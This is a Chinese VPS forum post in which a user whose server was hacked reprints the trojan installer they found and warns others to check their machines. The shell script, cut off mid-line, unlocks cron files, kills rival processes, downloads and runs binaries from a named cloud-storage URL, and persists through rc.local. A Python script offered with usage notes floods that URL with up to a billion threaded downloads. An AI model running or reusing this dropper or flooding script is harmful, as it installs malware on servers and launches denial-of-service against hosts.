VPS参考测评推荐
专注分享VPS主机优惠信息
        找回密码
衡天云优惠活动
华纳云优惠活动
荫云优惠活动
当前位置:主机参考 > 全球VPS主机讨论 > 正文 当前文章分类:全球VPS主机讨论

机器又被黑了,附上木马安装脚本,大家也自行检查下吧

2020-04-08 来源:主机参考 阅读(1137) 广告赞助
主机参考:VPS测评参考推荐/专注分享VPS服务器优惠信息!若您是商家可以在本站进行投稿,查看详情!此外我们还提供软文收录、PayPal代付、广告赞助等服务,查看详情!
我们发布的部分优惠活动文章可能存在时效性,购买时建议在本站搜索商家名称可查看相关文章充分了解该商家!若非中文页面可使用Edge浏览器同步翻译!PayPal代付/收录合作

突然检查到
  1. #!/bin/sh
  3. #version
  4. watchVersion=”-5e4b58b”
  5. nodeVersion=”-5e4b58b”
  7. #dealChattr
  8. find /etc/cron*|xargs chattr -i
  9. find /var/spool/cron*|xargs chattr -i
  11. #directory
  12. oldDirectory=$(pwd)
  13. mkdir -p /tmp
  14. chmod 1777 /tmp
  15. cd /tmp
  16. touch /var/tmp/writeable cd /var/tmp/
  17. touch /dev/shm/writeable cd /dev/shm
  18. touch ~/writeable cd ~/
  19. touch $oldDirectory/writeable cd $oldDirectory
  20. touch /usr/local/bin/writeable cd /usr/local/bin/
  21. touch /usr/libexec/writeable cd /usr/libexec/
  22. touch /usr/bin/writeable cd /usr/bin/
  23. rm -rf /var/tmp/writeable ~/writeable  $oldDirectory/writeable /dev/shm/writeable /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
  24. currentDirectory=$(pwd)
  26. #killPast
  27. ps auxf| grep system-watch*| grep -v grep| grep -v system-watch$watchVersion| awk ‘{print $2}’| xargs kill -9
  28. ps auxf| grep system-node*| grep -v grep| grep -v system-node$nodeVersion| awk ‘{print $2}’| xargs kill -9
  30. #rm oldVersion
  31. find system-watch* | grep -v system-watch$watchVersion | xargs rm
  32. find system-node* | grep -v system-node$nodeVersion | xargs rm
  35. ps -ef | grep “system-node” | grep -v “grep” | awk ‘{print $2}’ | xargs kill -9
  40. #watchRun?
  41. ps auxf | grep system-watch$watchVersion | grep -v grep
  42. if [ $? -eq 0 ]
  43. then
  44.         echo “watch running”
  45. else
  46.         #updateNew
  47.         curl -fsSL https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/watch_linux_`uname -m` -o system-watch$watchVersion || wget https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/watch_linux_`uname -m` -O system-watch$watchVersion
  48.         chmod +x system-watch$watchVersion
  49.         $currentDirectory/system-watch$watchVersion
  50. fi
  52. #nodeRun?
  53. ps auxf | grep system-node$nodeVersion | grep -v grep
  54. if [ $? -eq 0 ]
  55. then
  56.         echo “node running”
  57. else
  58.         #updateNew
  59.         curl -fsSL https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/node_linux_`uname -m` -o system-node$nodeVersion || wget https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/node_linux_`uname -m` -O system-node$nodeVersion
  60.         chmod +x system-node$nodeVersion
  61.         $currentDirectory/system-node$nodeVersion
  62. fi
  64. #rcLocal
  65. if test -d /etc/rc.d/
  66. then
  67.     echo “centos rc.local”
  68.     sed -i ‘/system-/d’ /etc/rc.d/rc.local
  69.         sed -i ‘/system_/d’ /etc/rc.d/rc.local
  70.         echo $currentDirectory/system-watch$watchVersion &复制代码

python3 木马下载脚本

使用方法

  1. #coding:utf-8
  2. import requests
  3. import threading
  5. # 并发数
  6. thread_max = threading.BoundedSemaphore(100)
  7. curl = requests.session()
  8. curl.timeout = 120
  9. curl.headers = {
  10.     ‘User-Agent’: ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36’
  11. }
  13. class MyThread(threading.Thread):
  15.     def __init__(self):
  16.         # 重写写父类的__init__方法
  17.         super(MyThread, self).__init__()
  18.         self.url = ‘https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/watch_linux_x86_64’
  20.     def run(self):
  21.         try:
  22.             url = self.url
  23.             if self.download(url):
  24.                 print(“下载成功: %s” % url)
  25.             else:
  26.                 print(“下载失败: %s” % url)
  27.         except Exception as e:
  28.             print(e)
  29.             pass
  30.         # 任务跑完移除线程
  31.         thread_max.release()
  33.     # 下载
  34.     def download(self, url):
  35.         try:
  36.             curl.get(url)
  37.             return True
  38.         except BaseException as e:
  39.             return False
  41. # 开始操作
  42. def start():
  43.     Thread_list = []
  44.     for url in range(1000000000):
  45.         # 如果线程达到最大值则等待前面线程跑完空出线程位置
  46.         thread_max.acquire()
  47.         p = MyThread()
  48.         p.start()
  49.         Thread_list.append(p)
  50.     for i in Thread_list:
  51.         i.join()
  54. if __name__ == ‘__main__’:
  55.     start()

复制代码

各路大神的回复:

注册: 矿工进驻了吗?

class: 学习了。。楼主分析出是怎么给你挂上去的吗??脚本??

这几篇文章你可能也喜欢:

  • 暂无相关推荐文章

本文由主机参考刊发,转载请注明:机器又被黑了,附上木马安装脚本,大家也自行检查下吧 https://zhujicankao.com/17291.html

【腾讯云】领8888元采购礼包,抢爆款云服务器 每月 9元起,个人开发者加享折上折!
【腾讯云】领8888元采购礼包,抢爆款云服务器 每月 9元起,个人开发者加享折上折!
打赏
转载请注明原文链接:主机参考 » 机器又被黑了,附上木马安装脚本,大家也自行检查下吧
主机参考仅做资料收集,不对商家任何信息及交易做信用担保,购买前请注意风险,有交易纠纷请自行解决!请查阅:特别声明

相关推荐

评论 抢沙发

评论前必须登录!

 

联系我们

本站提供:商家投稿 / 广告赞助 / 代付代购 等服务。

商务合作qq2232130061 一键联系
info@zhujicankao.com(备注:合作或投稿)

热门文章